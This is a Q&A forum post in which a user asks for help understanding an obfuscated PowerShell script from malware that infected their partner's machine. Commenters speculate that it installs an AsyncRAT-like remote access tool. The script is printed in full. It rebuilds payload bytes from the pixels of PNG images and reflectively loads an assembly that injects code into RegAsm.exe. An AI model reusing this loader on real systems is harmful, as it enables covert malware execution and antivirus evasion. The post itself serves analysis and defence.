# Powershell Script Deobfuscation

Tags: powershell, obfuscation, system.reflection, malware

I've recently going down a rabbit hole of picking apart a piece of malware that my partner had fallen victim to, looking through the Powershell Script in a testing environment.

I am very much new to this stuff, only having a VERY basic understanding. I can read individual pieces of this script, but it's purposefully hard to read. I just want to somewhat know what it's doing.

I've gotten pretty far with my playing, but I have hit a wall. It would be greatly appreciated if I could get a minor understanding of what the final line in the script is doing.

**This is the code. It's purposefully obfuscated by whoever wrote it.**

```
Add-Type -AssemblyName System.Drawing

$img = [System.Drawing.Image]::FromFile("$env:USERPROFILE\AppData\Roaming\PerfLogs\Image.png")
$img2 = [System.Drawing.Image]::FromFile("$env:USERPROFILE\AppData\Roaming\PerfLogs\pe.png")

$injpath = "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"


$File = New-Object 'System.Collections.Generic.List[Byte]'
$PE = New-Object 'System.Collections.Generic.List[Byte]'

  foreach($x in 1..$img.Width ) {
      $File.Add(($img.GetPixel($x -1,0).R))
  }

  foreach($x in 1..$img2.Width ) {
      $PE.Add(($img2.GetPixel($x -1,0).R))
  }
  try{
 schtasks /delete /tn det /f
  }catch{}
  $a = [Reflection.Assembly]
$a::'Load'($PE.ToArray()).GetType('NewPE.PE').GetMethod('Execute').Invoke($null,[object[]] ($injpath,$File.ToArray()))
```

**I know it's doing something naughty. That's the point. I just wanted to see what the community might have to say about it. Thanks!**

Comment: This doesn't seem the right place for this. Maybe SuperUser?

Comment: Seems to be registering something so it can be freely used remotely, most likely similar to AsyncRAT; keylogger, screen recorder, ability to execute stuff, etc.  I'm not sure what task name is `det`, but im willing to bet it could be the native `DetectHardwareChange` task.

Comment: ^this was based on some quick internet research, but one of the key points is `RegAsm.exe`. If you no longer have those images to look at yourself, it is very difficult to guess what they were doing. `$File` looks to be what is executed after they loaded the assembly which could be anything. `$PE` could just have been the code to load it's own methods to use that could get around security. Kinda like `Invoke-Expression` where it executes in memory so it's recommended not to use it as some AntiVirus programs pick it up in source code.

Comment: @AbrahamZinala Thank you for such a thorough response! I actually DO have those image files, and I actually ran the function and printed it out to a text document to see what it spits out.  It was a list of numbers on from 1-255, which I recognized and converted to Binary Bytes AND Hex, but didn't know how that could be used or analyzed even with trying to seek said information out